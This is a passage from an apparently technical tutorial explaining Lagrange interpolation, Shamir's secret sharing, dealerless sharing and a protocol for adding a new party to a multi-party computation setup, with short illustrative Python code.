\[\pi_i^t(x) = \begin{cases} 1 &\quad x=x_i\\ 0 &\quad x\neq x_i\\ \end{cases}\]Notice that for $x$ values which are not one of $x_0,…,x_{t}$ the value of $\pi_i^t(x)$ is not necessarily 0 or 1, and that there is exactly one polynomial that satisfies these constraints for every choice of $i$ and $t$ (according to the unique interpolation theorem). Thus, the polynomial $\pi_i^t(x)$ can be constructed with the following formula:
\[\pi_i^t(x) = \prod_{\substack{j=0\\j\neq i}}^{t}\frac{x - x_j}{x_i-x_j}\]This formula satisfies all our constraints:
The actual coefficients of $\pi_i^t(x)$ can be derived from this formula by programmatically multiplying the factors of the product.
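As a quick sanity check, the Lagrange basis polynomials can be evaluated programmatically over $\mathbb{Z}_p$; the prime modulus below is an arbitrary illustrative choice.

```python
PRIME = 2**31 - 1  # an arbitrary prime modulus, for illustration only

def lagrange_basis_at(i, xs, x):
    """Evaluate pi_i^t(x) = prod_{j != i} (x - x_j) / (x_i - x_j) over Z_PRIME."""
    num, den = 1, 1
    for j, xj in enumerate(xs):
        if j != i:
            num = num * (x - xj) % PRIME
            den = den * (xs[i] - xj) % PRIME
    # pow(den, -1, PRIME) is the modular inverse (Python 3.8+).
    return num * pow(den, -1, PRIME) % PRIME
```

Evaluating at the sample points themselves reproduces the 0/1 constraints above.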
Two observations that will allow us to reconstruct any polynomial of degree $\leq t$ from its samples at the points $x_0,…,x_{t}$ are as follows:
- Let $P(x)=\sum_{i=0}^{t}p_ix^i,Q(x)=\sum_{i=0}^{t}q_ix^i$ be two distinct polynomials of degree $\leq t$, then their sum is also a polynomial of degree $\leq t$.
This one is correct because their sum can be expressed as a polynomial where coefficients are simply added: \(P(x)+Q(x)=\sum_{i=0}^{t}(p_i+q_i)x^i\)
- Let $P(x)=\sum_{i=0}^tp_ix^i$ be a polynomial and let $a \neq 0$ be a constant. Then the product $a\cdot P(x)$ is also a polynomial of degree $\leq t$.
Similarly to the previous one, this observation is correct because the resulting polynomial is the same as the original polynomial with all coefficients just multiplied by $a$.
Great, now using these observations we can create a polynomial $P(x)$ such that $P(x_i)=y_i$ for all $0 \leq i \leq t$. First let’s show the construction of the polynomial and then explain why it satisfies the required properties. So, the polynomial is the following:
\[P(x) = \sum_{i=0}^ty_i\pi_i^t(x)\]First, according to the previous two observations, and since each $\pi_i^t(x)$ is a polynomial of degree $\leq t$, multiplying each $\pi_i^t(x)$ by a constant $y_i$ and summing them yields a polynomial of degree $\leq t$ as well, so we have checked the first requirement. Next, for each $x_i$ we get that:
\[\begin{split} P(x_i) & = \sum_{j=0}^ty_j\pi_j^t(x_i) \\ & = y_i\cdot\overset{=1}{\overbrace{\pi_i^t(x_i)}} + \sum_{j=0\\ j\neq i}^ty_j\overset{=0}{\overbrace{\pi_j^t(x_i)}} \\ & = y_i \end{split}\]thereby achieving the requested interpolation. This interpolation algorithm is known as “Lagrange Interpolation” and the $\pi_i^t$ are often referred to as “Lagrange Polynomials”.
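The whole of Lagrange interpolation condenses into a few lines over $\mathbb{Z}_p$. This is a sketch of the formula above with an illustrative prime modulus, not production MPC code.

```python
PRIME = 2**31 - 1  # illustrative prime modulus

def interpolate_at(points, x):
    """Evaluate the unique degree-<=t polynomial through `points`
    (a list of t+1 (x_i, y_i) pairs) at x, via P(x) = sum_i y_i * pi_i^t(x)."""
    total = 0
    for i, (xi, yi) in enumerate(points):
        term = yi
        for j, (xj, _) in enumerate(points):
            if j != i:
                # multiply by (x - x_j) / (x_i - x_j) mod PRIME
                term = term * (x - xj) * pow(xi - xj, -1, PRIME) % PRIME
        total = (total + term) % PRIME
    return total
```

For instance, sampling $5+2x+3x^2$ at $x=1,2,3$ gives the points $(1,10),(2,21),(3,38)$, and `interpolate_at([(1, 10), (2, 21), (3, 38)], 0)` recovers the constant term $5$.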
Now that we know how a polynomial can be (uniquely) interpolated from a set of its evaluations, let’s go back to the original polynomial-based secret-sharing scheme. The sharing goes as follows. The trusted dealer, who knows the secret $s$, will generate a polynomial $F(x)=\sum_{i=0}^tf_ix^i$ of degree $t$ such that $F(0) = f_0 = s$, where for $1\leq i \leq t$ the dealer picks $f_i$ randomly from the field $\mathbb{Z}_p$. The dealer then sends each party $i$ between $1$ and $n$ its share $p_i = F(i)$. In other words, each party $i$ holds a share of the secret, which is the polynomial $F$ evaluated at point $i$.
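The dealer's procedure can be sketched directly. The prime is an illustrative choice, and `reconstruct` is just Lagrange interpolation at $x=0$, as in the previous section.

```python
import secrets

PRIME = 2**31 - 1  # illustrative prime modulus

def deal_shares(secret, t, n):
    """Trusted dealer: pick a random degree-t polynomial F with F(0)=secret
    and hand party i the share (i, F(i))."""
    coeffs = [secret] + [secrets.randbelow(PRIME) for _ in range(t)]
    evaluate = lambda x: sum(c * pow(x, k, PRIME) for k, c in enumerate(coeffs)) % PRIME
    return [(i, evaluate(i)) for i in range(1, n + 1)]

def reconstruct(shares):
    """Lagrange-interpolate any t+1 shares at x=0 to recover the secret."""
    total = 0
    for i, (xi, yi) in enumerate(shares):
        term = yi
        for j, (xj, _) in enumerate(shares):
            if j != i:
                term = term * (0 - xj) * pow(xi - xj, -1, PRIME) % PRIME
        total = (total + term) % PRIME
    return total
```

Any $t+1$ of the $n$ shares recover the secret; which $t+1$ doesn't matter.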
So why does this even work? Since the polynomial $F$ is of degree $t$, any set of $t+1$ parties will be able to derive $F$ according to the unique interpolation theorem. However, any set of $t$ parties will not be able to learn anything about $F$ or $s$, since $p$ different polynomials can be constructed that all agree with the evaluations of $F$ given to these $t$ parties, each evaluating to a different value at point $0$.
This is all fun, but at this point we have a trusted dealer whom we must trust and who has access to the secret. In many MPC scenarios we want some secret $s$ to never exist at a single point, but still be able to make some computations based on its value. Therefore, we must find a way to get rid of the trusted dealer.
In this section we will try to get rid of the dealer and still achieve the same effect of Shamir’s secret sharing where a subset of $t+1$ out of $n$ parties, each holding $p_i$ - a share of a secret, can restore the secret, but without a dealer. One question that must be asked at this point is what is the meaning of $s$? In particular, since no one knows $s$ (since there is no dealer), what exactly are we trying to achieve? Well, we will change our goal by a little bit so that instead of sharing an existing secret $s$ held by the dealer, the parties will generate cooperatively a secret and share it between them without any party at any time holding the secret as a whole (or any information that may allow it to compute it efficiently).
This can be achieved in the following way. Party $i$ (for all $1\leq i \leq n$) will generate a local secret denoted $s_i$, so that the final secret $s$ shared among all parties will be $s = \sum_{i=1}^{n}s_i$. To achieve this, each party $i$ will share $s_i$ between all parties by following the steps of the dealer from the previous section. To be explicit, it will randomly create a polynomial $F_i(x)$ of degree at most $t$ such that $F_i(0) = s_i$ and send to party $j$ a share of this secret denoted by $p_{i,j}=F_i(j)$. Now each party $j$, who holds the secret shares $\left(p_{1,j},…,p_{n,j}\right) = \left(F_1(j),…,F_n(j)\right)$, will sum all these shares to get $p_j = \sum_{i=1}^np_{i,j}$. Since the $F_i(x)$ are all polynomials of degree at most $t$, their sum is also a polynomial of degree at most $t$, denoted by $F(x) = \sum_{i=1}^nF_i(x)$. Notice that:
Therefore, the parties end up in a state where each party holds a secret share $p_j$, which is the evaluation of a degree $\leq t$ polynomial $F(x)$ at point $j$, and the shared secret is $s=F(0)$. From the previous section we know that this allows each subset of parties of size $\geq t+1$ to compute the secret, while any subset of $\leq t$ parties will not be able to derive any information about it.
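A sketch of the dealerless round, simulating all parties locally. The prime is illustrative, and every "message" here is just a list index; a real protocol would send each $p_{i,j}$ over a private channel.

```python
import secrets

PRIME = 2**31 - 1  # illustrative prime modulus

def share_local(s_i, t, n):
    """Party i plays dealer for its own local secret s_i: returns [F_i(1),...,F_i(n)]."""
    coeffs = [s_i] + [secrets.randbelow(PRIME) for _ in range(t)]
    return [sum(c * pow(j, k, PRIME) for k, c in enumerate(coeffs)) % PRIME
            for j in range(1, n + 1)]

def dealerless_sharing(t, n):
    """Every party shares a random local secret; party j sums the pieces it receives.
    Returns (the implied global secret, the list of (j, p_j) shares) for checking."""
    local_secrets = [secrets.randbelow(PRIME) for _ in range(n)]
    pieces = [share_local(s, t, n) for s in local_secrets]   # pieces[i][j-1] = p_{i,j}
    shares = [(j, sum(pieces[i][j - 1] for i in range(n)) % PRIME)  # p_j = sum_i p_{i,j}
              for j in range(1, n + 1)]
    return sum(local_secrets) % PRIME, shares
```

Note that the function returns the global secret only so we can verify the construction; in the actual protocol nobody ever holds it.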
Without getting too much into details, the secret $s$ isn’t exposed to any party along the way, because if it were, it would imply that the original secret-sharing algorithm from the previous section is insecure; but it is secure, thanks to the unique interpolation theorem.
Now that we know just enough about how secret shares are generated, we consider the scenario in which a set of $n$ parties have a secret shared among them, so that each party $i$ holds a share of the secret, denoted $p_i=F(i)$, where $F(x)$ is a polynomial of degree at most $t$ and $F(0)=s$, where $s$ is the shared secret, which isn’t fully known to any party. The problem we want to solve is being able to add party $n+1$ to the setup so that it will have its own share of the secret, $p_{n+1} = F(n+1)$, while maintaining the demand that each set of $t+1$ parties will be able to make some MPC-driven computations on the secret and any set of up to $t$ parties will not be able to do so.
The most naive approach is to gather all $n+1$ parties together: the original $n$ parties forget their existing shares $p_i$, and all parties derive new shares $p’_i$ of a new secret $s’$. This is unsatisfactory since we don’t want the existing secret to change. On top of that, we would like the solution to require as little communication as possible.
Party $n+1$ should obtain $p_{n+1}=F(n+1)$ in a way that only it will learn $F(n+1)$ and no other party will learn anything about it. After obtaining this piece of information, the party will be able to collaborate with any set of $t$ additional parties to perform MPC-driven computations on the secret. The key observation which has driven us is:
If it only takes $t+1$ parties to compute the secret $s=F(0)$ it shouldn’t take more than $t+1$ parties to evaluate $F(n+1)$ and send it to party $n+1$.
According to this mindset, it should be possible to achieve a solution where not all parties are required in order to add a new party, at least in the happy flow where none of the parties is malicious.
One naive way in which a set of $t+1$ parties numbered $x_1,..,x_{t+1}$ could have done this is so that party $i$ will compute $Q_i=p_{x_i}\cdot\pi_{x_i}^t(n+1)$ and send it to the new party who will in turn sum these inputs to obtain $F(n+1)=\sum_{i=1}^{t+1}Q_i=\sum_{i=1}^{t+1}\left(p_{x_i}\cdot\pi_{x_i}^t(n+1)\right)$.
However, this imposes a major security risk: party $n+1$, receiving $Q_i$, can divide it by $\pi_{x_i}^t(n+1)$ (notice that $\pi_{x_i}^t$ is a publicly known polynomial) and obtain $p_{x_i}$ for each $i$, and thus reconstruct the polynomial $F(x)$ from those $t+1$ shares and obtain the secret! Therefore, we should look for another solution that doesn’t violate the security requirements.
Each party $i$ out of the $t+1$ collaborating parties could locally compute their local additive share of $F(n+1)$ which is $Q_i=p_{x_i}\cdot\pi_{x_i}^t(n+1)$. As mentioned earlier the sum of the $Q_i$ s equals to the share of party $n+1$ which is $F(n+1)$. ($\triangle$)
Thus, we will think of their sum as a secret, and we would like to share it. Recall that Shamir’s secret sharing without a dealer allowed some parties to distribute a secret between them so that the shared secret is the sum of the local secrets of all parties. In our case the local secret of each party will be $Q_i$, and running this algorithm where each party uses $Q_i$ as its local secret will result in each party $i$ holding the evaluation of some polynomial $G(x)$ at point $i$ such that $G(0)$ is the sum of all the local secrets $Q_i$, which equals $F(n+1)$, the share of party $n+1$ (see $\triangle$). Each party will send its respective evaluation $G(i)$ to party $n+1$, who will be able to reconstruct the polynomial $G(x)$ and compute $F(n+1)$. Assuming Shamir’s secret sharing without a dealer is secure, no party should be able to infer $G(0)=F(n+1)$, and party $n+1$ shouldn’t be able to infer the secrets of the rest of the parties.
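Putting the pieces together, here is a sketch of the whole procedure, simulating all $t+1$ helpers locally. In a real deployment each $Q_i$ re-share travels over a private channel; the prime and all function names are my own illustrative choices.

```python
import secrets

PRIME = 2**31 - 1  # illustrative prime modulus

def basis_at(i, xs, x):
    """Lagrange basis pi_i evaluated at x over Z_PRIME."""
    num, den = 1, 1
    for j, xj in enumerate(xs):
        if j != i:
            num = num * (x - xj) % PRIME
            den = den * (xs[i] - xj) % PRIME
    return num * pow(den, -1, PRIME) % PRIME

def add_party(shares, new_x):
    """`shares`: the t+1 (x_i, F(x_i)) pairs held by the helpers. Returns F(new_x)
    as the new party would compute it, without any helper revealing p_{x_i}."""
    xs = [x for x, _ in shares]
    t = len(shares) - 1
    # Additive shares of F(new_x): Q_i = p_{x_i} * pi_{x_i}(new_x).
    Q = [y * basis_at(i, xs, new_x) % PRIME for i, (x, y) in enumerate(shares)]
    # Each helper re-shares its Q_i with a fresh random degree-t polynomial G_i(0)=Q_i.
    G_evals = []
    for q in Q:
        coeffs = [q] + [secrets.randbelow(PRIME) for _ in range(t)]
        G_evals.append([sum(c * pow(x, k, PRIME) for k, c in enumerate(coeffs)) % PRIME
                        for x in xs])
    # Helper j sums the pieces it received: G(x_j) = sum_i G_i(x_j), then sends it on.
    G = [(xs[j], sum(G_evals[i][j] for i in range(len(Q))) % PRIME)
         for j in range(len(xs))]
    # The new party interpolates G at 0: G(0) = sum_i Q_i = F(new_x).
    gxs = [x for x, _ in G]
    return sum(y * basis_at(j, gxs, 0) for j, (x, y) in enumerate(G)) % PRIME
```

For example, with $F(x)=7+3x+5x^2$ shared at $x=1,2,3$, the helpers can jointly deliver $F(4)$ to a fourth party while each sees only a blinded $G(x_j)$.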